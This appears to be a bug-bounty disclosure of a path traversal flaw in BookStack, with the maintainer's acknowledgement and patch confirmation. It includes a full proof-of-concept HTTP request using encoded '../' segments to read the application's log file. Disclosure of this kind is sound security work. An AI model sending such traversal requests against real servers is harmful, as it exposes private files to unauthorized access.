Path Traversal in bookstackapp/bookstack
Reported on
Oct 30th 2021
Description
During reading recent BookStack source code (85dc8d) I discovered path traversal vulnerability. Authenticated user can have access to all files stored in storage directory.
Proof of Concept
GET /uploads/images/..%2f/..%2f/logs/laravel.log HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: XSRF-TOKEN=eyJpdiI6IkY0TGptRjlIa29xXC9iSFZqaE91bzVnPT0iLCJ2YWx1ZSI6Im9nZVZSblYxQmt1QXE5Tk9wS0NHVnhraGUySWlrNjhEZGVyeWhoN0ZOdjcxc2ZzTUFIYlozTHVJVzFMZ3VMMjdROUhCUTFjY2s4MVl0MUIxNGU0eWlnT1ErQlpUNHBGQTBJOHErcjR3MW1USVlkbGxCN21INm5pSDZVbk1pQkVBIiwibWFjIjoiNjZkNTUzM2YzMDE2ZjQwZTBiZTM5MTQ5NDY4NjQ4NmE1YzlkOTBhMDIyZjIyNTI2YjYxNjdiMWVhY2ZiMThiZCJ9; bookstack_session=eyJpdiI6Ik1iSDluUVVNU2JMblh0YmJmSjhNSEE9PSIsInZhbHVlIjoiS04wWk5DaEthMVVxUVFuMlwvNGdqVHpHRE95bFk1VjNJTzRvZTZQeVV1blZ3SUhFQ21ySTF1eFRWUWFtZlBiTEdTVzlCWlFxOGdUVEl4RmN1aDhIcUNzXC9tamFKQk1hVStuS2o3RUlUczJQRlo2OGp6NGs2OHU3Q1FGMjZJVlpLUSIsIm1hYyI6ImM3NmY2YWQ0MjdlYTU5OGEyMmQxNWI1NDMyMTQwMzE3NWMzODhiNmFiZDJhN2VmODA1YzExOTVjMWY1MTZmNTIifQ%3D%3D
Upgrade-Insecure-Requests: 1
Impact
Read log files which paths are predictable.
Occurrences
Thanks you so much again @theworstcomrade. Have verified on my own instance. Looks like there are some level of webserver protections that prevent this going too far up which is something but still far from ideal.
I'm especially annoyed at myself for having this vulnerability. Think I need to do a review through all image and attachment systems as many of these were written before I've been exposed to, and learnt from, a wide range of attack vectors.
Will mark this as valid and work into a patch to be deployed with the other fix.
Since you won't be paid due to the depleted bucket, is there a way I can send you £40 myself? I really appreciate your efforts of discovering and reporting this.
@ssdmanbrown This patch looks good, I am no longer able to repeat the vulnerability. Thank You also for the bounty.